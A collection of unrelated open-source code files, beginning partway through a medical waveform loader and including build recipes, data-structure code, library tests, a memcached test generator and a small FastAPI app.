channels until after the initial load. To deal with this case, when no channel indices are provided, we generate a list of channel indices using the lookup table and default channel requests that are hardcoded for each medical waveform data type. Those channel indices will be used as the request indices. Args: data_source: The DataSource for the waveform data. """ default_channel_names = [] if data_source.GetFileType() == 'EEG': default_channel_names = _DOUBLE_BANANA elif (data_source.GetFileType() == 'EKG' or data_source.GetFileType() == 'ECG'): default_channel_names = _ECG_12_LEAD default_channel_ids = [_GetChannelDataIdFromNameOptions(x, data_source) for x in default_channel_names] return [channel_id for channel_id in default_channel_ids if channel_id] def GetChunk(data_source, request, max_samples): """Returns all graph data for current chunk. Args: data_source: The DataSource for the waveform data. request: A DataRequest proto instance. max_samples: The maximum number of samples in one channel response. Returns: A WaveformChunkResponse specified by the Request proto. Raises: ValueError: If chunk duration is not a positive integer. """ if (request.chunk_start >= data_source.GetLength() or request.chunk_start + request.chunk_duration_secs <= 0): raise ValueError('Chunk starting at %s is out of bounds' % request.chunk_start) if not request.channel_data_ids: default_channels = _GetDefaultChannelDataIdList(data_source) logging.info('Loading default channels') request.channel_data_ids.extend(default_channels) response = data_pb2.WaveformChunk() waveform_datatable, sampling_freq = _CreateChunkDataTableJSon(data_source, request, max_samples) response.waveform_datatable = waveform_datatable response.sampling_freq = sampling_freq response.channel_data_ids.extend(request.channel_data_ids) return response def GetChunkDataAsNumpy(data_source, channel_data_ids, low_cut, high_cut, notch): """Extract data from a data source as a numpy array. Args: data_source: A DataSource instance. channel_data_ids: ChannelDataIds list. low_cut: lower frequency to apply a band-pass filter. high_cut: higher frequency to apply a band-pass filter. notch: frequency to apply a notch filter. Returns: Numpy array of shape (n_channels, n_data) with the waveform data. """ channel_data, channel_names = _CreateChannelData(data_source, channel_data_ids, low_cut, high_cut, notch) data = [channel_data[channel_name] for channel_name in channel_names] data = np.array(data, dtype=np.float32) return data
docs/conf.py
Leanny/mmpy_bot
196
11097363
# -*- coding: utf-8 -*- import os from mmpy_bot import __version__ os.environ["DJANGO_SETTINGS_MODULE"] = "settings" extensions = ["sphinx.ext.autodoc", "sphinx.ext.todo"] templates_path = ["_templates"] source_suffix = ".rst" master_doc = "index" project = "mmpy_bot" copyright = "2016, " version = __version__ release = __version__ exclude_patterns = [] pygments_style = "sphinx" html_theme = "default" htmlhelp_basename = "mmpy_botdoc" latex_documents = [ ("index", "mmpy_bot.tex", "mmpy_bot Documentation", "", "manual"), ] man_pages = [("index", "mmpy_bot", "mmpy_bot Documentation", ["gotlium"], 1)] texinfo_documents = [ ( "index", "mmpy_bot", "Mattermost-bot Documentation", "gotlium", "mmpy_bot", "One line description of project.", "Miscellaneous", ), ]
recipes/opencore-amr/all/conanfile.py
rockandsalt/conan-center-index
562
11097378
<gh_stars>100-1000 from conans import ConanFile, AutoToolsBuildEnvironment, tools from contextlib import contextmanager import os required_conan_version = ">=1.33.0" class OpencoreAmrConan(ConanFile): name = "opencore-amr" homepage = "https://sourceforge.net/projects/opencore-amr/" description = "OpenCORE Adaptive Multi Rate (AMR) speech codec library implementation." topics = ("audio-codec", "amr", "opencore") url = "https://github.com/conan-io/conan-center-index" license = "Apache-2.0" settings = "os", "compiler", "build_type", "arch" options = { "shared": [True, False], "fPIC": [True, False], } default_options = { "shared": False, "fPIC": True, } _autotools = None @property def _source_subfolder(self): return "source_subfolder" @property def _settings_build(self): return getattr(self, "settings_build", self.settings) def config_options(self): if self.settings.os == "Windows": del self.options.fPIC def configure(self): if self.options.shared: del self.options.fPIC def build_requirements(self): if self._settings_build.os == "Windows" and not tools.get_env("CONAN_BASH_PATH"): self.build_requires("msys2/cci.latest") if self.settings.compiler == "Visual Studio": self.build_requires("automake/1.16.4") def source(self): tools.get(**self.conan_data["sources"][self.version], destination=self._source_subfolder, strip_root=True) @contextmanager def _build_context(self): if self.settings.compiler == "Visual Studio": with tools.vcvars(self): env = { "CC": "cl -nologo", "CXX": "cl -nologo", "LD": "link -nologo", "AR": "{} lib".format(tools.unix_path(self.deps_user_info["automake"].ar_lib)), } with tools.environment_append(env): yield else: yield def _configure_autotools(self): if self._autotools: return self._autotools self._autotools = AutoToolsBuildEnvironment(self, win_bash=tools.os_info.is_windows) yes_no = lambda v: "yes" if v else "no" args = [ "--enable-shared={}".format(yes_no(self.options.shared)), "--enable-static={}".format(yes_no(not self.options.shared)), ] if self.settings.compiler == "Visual Studio": self._autotools.cxx_flags.append("-EHsc") if tools.Version(self.settings.compiler.version) >= "12": self._autotools.flags.append("-FS") self._autotools.configure(args=args, configure_dir=self._source_subfolder) return self._autotools def build(self): with self._build_context(): self._configure_autotools() self._autotools.make() def package(self): self._autotools.install() self.copy("LICENSE", dst="licenses", src=self._source_subfolder) tools.remove_files_by_mask(os.path.join(self.package_folder, "lib"), "*.la") tools.rmdir(os.path.join(self.package_folder, "lib", "pkgconfig")) if self.settings.compiler == "Visual Studio" and self.options.shared: for lib in ("opencore-amrwb", "opencore-amrnb"): tools.rename(os.path.join(self.package_folder, "lib", "{}.dll.lib".format(lib)), os.path.join(self.package_folder, "lib", "{}.lib".format(lib))) def package_info(self): for lib in ("opencore-amrwb", "opencore-amrnb"): self.cpp_info.components[lib].names["pkg_config"] = lib self.cpp_info.components[lib].libs = [lib]
samples/python/logpolar.py
thisisgopalmandal/opencv
56,632
11097390
<reponame>thisisgopalmandal/opencv<gh_stars>1000+ #!/usr/bin/env python ''' plots image as logPolar and linearPolar Usage: logpolar.py Keys: ESC - exit ''' # Python 2/3 compatibility from __future__ import print_function import numpy as np import cv2 as cv def main(): import sys try: fn = sys.argv[1] except IndexError: fn = 'fruits.jpg' img = cv.imread(cv.samples.findFile(fn)) if img is None: print('Failed to load image file:', fn) sys.exit(1) img2 = cv.logPolar(img, (img.shape[0]/2, img.shape[1]/2), 40, cv.WARP_FILL_OUTLIERS) img3 = cv.linearPolar(img, (img.shape[0]/2, img.shape[1]/2), 40, cv.WARP_FILL_OUTLIERS) cv.imshow('before', img) cv.imshow('logpolar', img2) cv.imshow('linearpolar', img3) cv.waitKey(0) print('Done') if __name__ == '__main__': print(__doc__) main() cv.destroyAllWindows()
underworld/libUnderworld/config/packages/libm.py
longgangfan/underworld2
116
11097394
from config import Package class libm(Package): def gen_locations(self): yield ('/usr/local', ['/usr/local'], ['/usr/local']) def gen_envs(self, loc): for env in Package.gen_envs(self, loc): self.headers = ['math.h'] if self.find_libraries(loc[2], 'm'): env.PrependUnique(LIBS=['m']) yield env
indra/tests/test_omnipath.py
zebulon2/indra
136
11097421
<reponame>zebulon2/indra import requests from indra.sources.omnipath import OmniPathProcessor from indra.sources.omnipath.api import op_url from indra.statements import Agent from indra.ontology.standardize import standardize_agent_name BRAF_UPID = 'P15056' JAK2_UPID = 'O60674' CALM1_UPID = 'P0DP23' TRPC3_UPID = 'Q13507' BRAF_AG = Agent(None, db_refs={'UP': BRAF_UPID}) standardize_agent_name(BRAF_AG) JAK2_AG = Agent(None, db_refs={'UP': JAK2_UPID}) standardize_agent_name(JAK2_AG) CALM1_AG = Agent(None, db_refs={'UP': CALM1_UPID}) standardize_agent_name(CALM1_AG) TRPC3_AG = Agent(None, db_refs={'UP': TRPC3_UPID}) standardize_agent_name(TRPC3_AG) def test_omnipath_web_api(): query_url = '%s/queries' % op_url res = requests.get(query_url) assert res.status_code == 200 def test_mods_from_web(): params = {'format': 'json', 'substrates': JAK2_UPID, 'fields': ['sources', 'references']} ptm_url = '%s/ptms' % op_url res = requests.get(ptm_url, params=params) assert res.status_code == 200 assert res.text ptm_json = res.json() assert ptm_json[0]['substrate'] == JAK2_UPID, ptm_json[0]['substrate'] op = OmniPathProcessor(ptm_json=ptm_json) op.process_ptm_mods() stmts = op.statements assert JAK2_AG.name in [a.name for a in stmts[0].agent_list()],\ stmts[0].agent_list() assert 'omnipath' == stmts[0].evidence[0].source_api,\ stmts[0].evidence[0].source_api def test_ligrec_from_web(): params = {'format': 'json', 'datasets': ['ligrecextra'], 'fields': ['curation_effort', 'entity_type', 'references', 'resources', 'sources', 'type'], 'sources': [CALM1_UPID]} query_url = '%s/interactions' % op_url res = requests.get(query_url, params) assert res.status_code == 200 assert res.text assert 'error' not in res.text.lower() ligrec_json = res.json() assert ligrec_json[0]['source'] == CALM1_UPID op = OmniPathProcessor(ligrec_json=ligrec_json) op.process_ligrec_interactions() stmts = op.statements assert CALM1_AG.name in [a.name for a in stmts[0].agent_list()], \ stmts[0].agent_list() assert 'omnipath' == stmts[0].evidence[0].source_api,\ stmts[0].evidence[0].source_api
brew/metrics/evaluation.py
va26/brew
344
11097437
import numpy as np import sklearn import sklearn.metrics class Evaluator(object): def __init__(self, metric='auc'): if metric == 'auc': self.metric = auc_score elif metric == 'acc': self.metric = acc_score def calculate(self, y_true, y_pred): return self.metric(y_true, y_pred) def auc_score(y_true, y_pred, positive_label=1): if hasattr(sklearn.metrics, 'roc_auc_score'): return sklearn.metrics.roc_auc_score(y_true, y_pred) fp_rate, tp_rate, thresholds = sklearn.metrics.roc_curve( y_true, y_pred, pos_label=positive_label) return sklearn.metrics.auc(fp_rate, tp_rate) def acc_score(y_true, y_pred, positive_label=1): if hasattr(sklearn.metrics, 'accuracy_score'): return sklearn.metrics.accuracy_score(y_true, y_pred) return float(np.sum(y_true == y_pred)) / y_true.shape[0]
data_structures/trees/treap.py
vinta/fuck-coding-interviews
590
11097443
# coding: utf-8 """ Treap https://en.wikipedia.org/wiki/Treap Treap is a self-balancing binary search tree which satisfies some extra properties: - Each node has a random priority. - Each random priority satisfies the properties of a heap. - The parent's priority is less than or equal to children's priorities. - The root's priority would be the minimum of the tree. - Each of left and right subtree is also a heap. """ import random class TreeNode: __slots__ = ['_priority', 'value', 'left', 'right'] def __init__(self, value, left=None, right=None): self._priority = random.random() # Read-only. self.value = value self.left = left self.right = right @property def priority(self): return self._priority def right_rotate(self): # root pivot # / \ / \ # pivot gamma => alpha root # / \ / \ # alpha beta beta gamma # https://en.wikipedia.org/wiki/Tree_rotation root = self pivot = root.left root.left = pivot.right pivot.right = root return pivot def left_rotate(self): root = self pivot = root.right root.right = pivot.left pivot.left = root return pivot def check_validation(self): if self.left: assert self.priority <= self.left.priority self.left.check_validation() if self.right: assert self.priority <= self.right.priority self.right.check_validation() class Treap: DEFAULT_TO_ROOT = object() NODE_CLASS = TreeNode def __init__(self): self.root = None self.size = 0 def __len__(self): return self.size def __iter__(self): return self.inorder_traverse(self.root) def _search_node(self, node, value): if not node: return None if value == node.value: return node elif value < node.value: return self._search_node(node.left, value) elif value > node.value: return self._search_node(node.right, value) def search(self, value): return self._search_node(self.root, value) def _insert_node(self, node, value): if not node: self.size += 1 node = self.NODE_CLASS(value=value) return node if value <= node.value: node.left = self._insert_node(node.left, value) if node.left.priority < node.priority: node = node.right_rotate() elif value > node.value: node.right = self._insert_node(node.right, value) if node.right.priority < node.priority: node = node.left_rotate() return node def insert(self, value): self.root = self._insert_node(self.root, value) def _delete_node(self, node, value): if not node: raise ValueError('Not found') if value == node.value: if (node.left is None) and (node.right is None): # Leaf nodes can be simply deleted. self.size -= 1 return None elif node.left is None: self.size -= 1 return node.right elif node.right is None: self.size -= 1 return node.left elif node.left and node.right: if node.left.priority < node.right.priority: node = node.right_rotate() node.right = self._delete_node(node.right, value) else: node = node.left_rotate() node.left = self._delete_node(node.left, value) elif value < node.value: node.left = self._delete_node(node.left, value) elif value > node.value: node.right = self._delete_node(node.right, value) return node def delete(self, value): self.root = self._delete_node(self.root, value) def inorder_traverse(self, node): if not node: return yield from self.inorder_traverse(node.left) yield node.value yield from self.inorder_traverse(node.right) def levelorder_traverse_nodes(self, node=DEFAULT_TO_ROOT): if node == self.DEFAULT_TO_ROOT: node = self.root current_level = [node, ] while current_level: next_level = [] for node in current_level: if node: yield node next_level.extend([node.left, node.right]) current_level = next_level
beartype_test/a00_unit/a20_api/vale/_factory/test_valeisobj.py
vcokltfre/beartype
1,056
11097445
<filename>beartype_test/a00_unit/a20_api/vale/_factory/test_valeisobj.py #!/usr/bin/env python3 # --------------------( LICENSE )-------------------- # Copyright (c) 2014-2021 Beartype authors. # See "LICENSE" for further details. ''' **Beartype code-based object data validation unit tests.** This submodule unit tests the subset of the public API of the :mod:`beartype.vale` subpackage defined by the private :mod:`beartype.vale._factory._valeisobj` submodule. ''' # ....................{ IMPORTS }.................... #!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! # WARNING: To raise human-readable test errors, avoid importing from # package-specific submodules at module scope. #!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! # ....................{ CONSTANTS }.................... AS_WHEN_NIGHT_IS_BARE = ( "From one lonely cloud", "The moon rains out her beams, and Heaven is overflow'd.", ) ''' Arbitrary tuple to be assigned to an arbitrary instance variable of the arbitrary class defined below. ''' # ....................{ CLASSES ~ good }.................... class AllTheEarthAndAir(object): ''' Arbitrary class defining an arbitrary attribute whose value has *no* accessible attributes but satisfies a validator tested below. ''' def __init__(self) -> None: ''' Initialize this object by defining this attribute. ''' # Initialize this attribute to a shallow copy of this list rather # than this list itself to properly test equality comparison. self.with_thy_voice_is_loud = AS_WHEN_NIGHT_IS_BARE[:] class WhatThouArtWeKnowNot(object): ''' Arbitrary class defining an arbitrary attribute whose value is an instance of another class defining another arbitrary attribute. ''' def __init__(self) -> None: ''' Initialize this object by defining this attribute. ''' self.what_is_most_like_thee = AllTheEarthAndAir() # ....................{ CLASSES ~ bad }.................... class InAPalaceTower(object): ''' Arbitrary class defining an arbitrary attribute of a differing name as that defined by the :class:`AllTheEarthAndAir` class. ''' def __init__(self) -> None: ''' Initialize this object by defining this attribute. ''' self.soothing_her_love_laden = [ 'Soul in secret hour', 'With music sweet as love, which overflows her bower:', ] class TillTheWorldIsWrought(object): ''' Arbitrary class defining an arbitrary attribute of the same name as that defined by the :class:`AllTheEarthAndAir` class whose value has *no* accessible attributes and does *not* satisfy a validator tested below. ''' def __init__(self) -> None: ''' Initialize this object by defining this attribute. ''' # Initialize this attribute to an arbitrary list unequal to the value # initializing the comparable # "AllTheEarthAndAir.with_thy_voice_is_loud" attribute. self.with_thy_voice_is_loud = [ 'To sympathy with hopes and fears it heeded not:', 'As from thy presence showers a rain of melody.', ] class InADellOfDew(object): ''' Arbitrary class defining an arbitrary attribute of the same name as that defined by the :class:`WhatThouArtWeKnowNot` class whose value is an instance of another class defining an attribute of the same name as that defined by the :class:`AllTheEarthAndAir` class whose value does *not* satisfy a validator tested below. ''' def __init__(self) -> None: ''' Initialize this object by defining this attribute. ''' self.what_is_most_like_thee = TillTheWorldIsWrought() # ....................{ TESTS ~ class : isattr }.................... def test_api_vale_isattr_pass() -> None: ''' Test successful usage of the :mod:`beartype.vale.IsAttr` factory. ''' # Defer heavyweight imports. from beartype.vale import IsAttr, IsEqual from beartype.vale._valevale import BeartypeValidator # Instances of valid test classes declared above. from_rainbow_clouds = AllTheEarthAndAir() drops_so_bright_to_see = WhatThouArtWeKnowNot() # Instances of invalid test classes declared above. like_a_glow_worm_golden = InAPalaceTower() like_a_high_born_maiden = TillTheWorldIsWrought() scattering_unbeholden = InADellOfDew() # Validator produced by subscripting this factory with the name of an # attribute defined by the former class and that attribute's value. IsInTheLightOfThought = IsAttr[ 'with_thy_voice_is_loud', IsEqual[AS_WHEN_NIGHT_IS_BARE]] # Validator produced by subscripting this factory with the name of an # attribute defined by the latter class and the prior validator. IsSingingHymnsUnbidden = IsAttr[ 'what_is_most_like_thee', IsInTheLightOfThought] # Assert these validators satisfy the expected API. assert isinstance(IsInTheLightOfThought, BeartypeValidator) assert isinstance(IsSingingHymnsUnbidden, BeartypeValidator) # Assert these validators produce the same objects when subscripted by the # same arguments (and are thus memoized on subscripted arguments). assert IsSingingHymnsUnbidden is IsAttr[ 'what_is_most_like_thee', IsInTheLightOfThought] # Assert these validators accept objects defining attributes with the same # names and values as those subscripting these validators. assert IsInTheLightOfThought.is_valid(from_rainbow_clouds) is True assert IsSingingHymnsUnbidden.is_valid(drops_so_bright_to_see) is True # Assert these validators reject objects defining attributes with differing # names to those subscripting these validators. assert IsInTheLightOfThought.is_valid(like_a_glow_worm_golden) is False assert IsSingingHymnsUnbidden.is_valid(like_a_glow_worm_golden) is False # Assert these validators reject objects defining attributes with the same # names but differing values to those subscripting these validators. assert IsInTheLightOfThought.is_valid(like_a_high_born_maiden) is False assert IsSingingHymnsUnbidden.is_valid(scattering_unbeholden) is False # Assert these validators have the expected representation. IsInTheLightOfThought_repr = repr(IsInTheLightOfThought) assert repr('with_thy_voice_is_loud') in IsInTheLightOfThought_repr assert repr(AS_WHEN_NIGHT_IS_BARE) in IsInTheLightOfThought_repr # Validator synthesized from the above validators with the domain-specific # language (DSL) supported by these validators. IsInTheLightOfThoughtOrSingingHymnsUnbidden = ( IsInTheLightOfThought | IsSingingHymnsUnbidden) # Assert this object performs the expected validation. assert IsInTheLightOfThoughtOrSingingHymnsUnbidden.is_valid( AllTheEarthAndAir()) is True assert IsInTheLightOfThoughtOrSingingHymnsUnbidden.is_valid( WhatThouArtWeKnowNot()) is True assert IsInTheLightOfThoughtOrSingingHymnsUnbidden.is_valid( InAPalaceTower()) is False assert IsInTheLightOfThoughtOrSingingHymnsUnbidden.is_valid( TillTheWorldIsWrought()) is False assert IsInTheLightOfThoughtOrSingingHymnsUnbidden.is_valid( InADellOfDew()) is False # Assert this object provides the expected representation. assert '|' in repr(IsInTheLightOfThoughtOrSingingHymnsUnbidden) def test_api_vale_isattr_fail() -> None: ''' Test unsuccessful usage of the :mod:`beartype.vale.IsAttr` factory. ''' # Defer heavyweight imports. from beartype.roar import BeartypeValeSubscriptionException from beartype.vale import IsAttr, IsEqual from pytest import raises # Assert that subscripting this factory with the empty tuple raises the # expected exception. with raises(BeartypeValeSubscriptionException): IsAttr[()] # Assert that subscripting this factory with the empty tuple raises the # expected exception. with raises(BeartypeValeSubscriptionException): IsAttr[()] # Assert that subscripting this factory with one non-tuple argument raises # the expected exception. with raises(BeartypeValeSubscriptionException): IsAttr['Among the flowers and grass, which screen it from the view:'] # Assert that subscripting this factory with three or more arguments raises # the expected exception. with raises(BeartypeValeSubscriptionException): IsAttr[ "Like a rose embower'd", "In its own green leaves,", "By warm winds deflower'd,", ] # Assert that subscripting this factory with two arguments whose first # argument is *NOT* a string raises the expected exception. with raises(BeartypeValeSubscriptionException): IsAttr[ IsEqual['Till the scent it gives'], IsEqual[ 'Makes faint with too much sweet those heavy-winged thieves:']] # Assert that subscripting this factory with two arguments whose first # argument is the empty string raises the expected exception. with raises(BeartypeValeSubscriptionException): IsAttr['', IsEqual['Sound of vernal showers']] # Assert that subscripting this factory with two arguments whose first # argument is an invalid Python identifier raises the expected exception. with raises(BeartypeValeSubscriptionException): IsAttr['On the twinkling grass,', IsEqual["Rain-awaken'd flowers,"]]
Acceleration/memcached/regressionSims/testgen/memlib_example.py
pooyaww/Vivado_HLS_Samples
326
11097449
#!/usr/bin/python import memlib ## FORMATTING A KV-PAIR ####################################################### # V1 ShortTest = memlib.kv_pair("k", "v", "DEADBEEF", 42) # V2 Integration1 = { "key" : "this-is-the-key-that-i'll-be-using-for-the-next-time-to-test-the-longest-of-all-keys", "value" : "aaaaaaaabbbbbbbbccccccccddddddddeeeeeeeeffffffffgggggggghhhhhhhhiiiiiiiijjjjjjjjkkkkkkkkllllllllmmmmmmmmnnnnnnnnooooooooppppppppqqqqqqqqrrrrrrrrssssssssttttttttuuuuuuuuvvvvvvvvwwwwwwwwxxxxxxxxyyyyyyyyzzzzzzzz", "flags" : "0000002a", # 32bit, hex-encoded "expiration" : 13 } ## CREATING SINGLE REQUESTS #################################################### print "Binary Set Request" rq = memlib.binarySetRequest(Integration1, "aabbccdd") print memlib.simulationInput(rq) print "Binary Set Response" rq = memlib.binarySetResponse(Integration1, "aabbccdd") print memlib.simulationOutput(rq) print "Binary Get Request" rq = memlib.binaryGetRequest(Integration1, "aabbccdd") print memlib.simulationInput(rq) print "2 Binary Get Request w/o delay" print memlib.simulationInput(rq, False), # the ',' avoids the newline after print. print memlib.simulationInput(rq) print "Binary Get Response" rq = memlib.binaryGetResponse(Integration1, "aabbccdd") print memlib.simulationOutput(rq) ## CREATING FULL TESTSET ####################################################### print "Two Request @ Rate 12Gbps/1Gbps" r1 = memlib.binarySetRequest(Integration1) r2 = memlib.binaryGetRequest(Integration1) print memlib.requests12Gbps([r1, r2]) print memlib.requests1Gbps([r1, r2]) r1 = memlib.binarySetResponse(Integration1) r2 = memlib.binaryGetResponse(Integration1) print memlib.responses([r1, r2]) print "Useful functions" print ("%08x" % 42) print "Key".encode('hex')
drawBot/context/icnsContext.py
andyclymer/drawbot
302
11097455
<filename>drawBot/context/icnsContext.py<gh_stars>100-1000 import Quartz import os import shutil import tempfile from drawBot.misc import executeExternalProcess, DrawBotError from drawBot.context.imageContext import ImageContext class ICNSContext(ImageContext): fileExtensions = ["icns"] allowedPageSizes = [16, 32, 128, 256, 512, 1024] def _writeDataToFile(self, data, path, options): # create a iconset folder iconsetPath = tempfile.mkdtemp(suffix=".iconset") try: # get the complete pdf pdfDocument = Quartz.PDFDocument.alloc().initWithData_(data) pageCount = pdfDocument.pageCount() # set the image resolution options["imageResolution"] = 72 # make a copy and alter the resolution options_2x = dict(options) options_2x["imageResolution"] = 144 # start loop over all pages for index in range(pageCount): # get the pdf page page = pdfDocument.pageAtIndex_(index) # get the pdf page, this acts also as pdf document... pageData = page.dataRepresentation() # extract the size of the page _, (w, h) = page.boundsForBox_(Quartz.kPDFDisplayBoxArtBox) w = int(round(w)) h = int(round(h)) # dont allow any other size, the command iconutil will not work otherwise if w not in self.allowedPageSizes or w != h: raise DrawBotError("The .icns can not be build with the size '%sx%s'. Must be either: %s" % (w, h, ", ".join(["%sx%s" % (i, i) for i in self.allowedPageSizes]))) # generate a 72 dpi png in the iconset path pngPath = os.path.join(iconsetPath, "icon_%sx%s.png" % (w, h)) super(ICNSContext, self)._writeDataToFile(pageData, pngPath, options) # generate a 144 dpi png in the iconset path pngPath_2x = os.path.join(iconsetPath, "icon_%sx%[email protected]" % (w, h)) super(ICNSContext, self)._writeDataToFile(pageData, pngPath_2x, options_2x) # collect all iconutil commands cmds = [ "iconutil", "--convert", "icns", "--output", path, iconsetPath, ] # execute the commands stdout, stderr = executeExternalProcess(cmds) finally: # always remove the iconset shutil.rmtree(iconsetPath)
app.py
sahilt20/fastapi-mongo
120
11097472
<reponame>sahilt20/fastapi-mongo from fastapi import FastAPI, Depends from auth.jwt_bearer import JWTBearer from routes.student import router as StudentRouter from routes.admin import router as AdminRouter app = FastAPI() token_listener = JWTBearer() @app.get("/", tags=["Root"]) async def read_root(): return {"message": "Welcome to this fantastic app."} app.include_router(AdminRouter, tags=["Administrator"], prefix="/admin") app.include_router(StudentRouter, tags=["Students"], prefix="/student", dependencies=[Depends(token_listener)])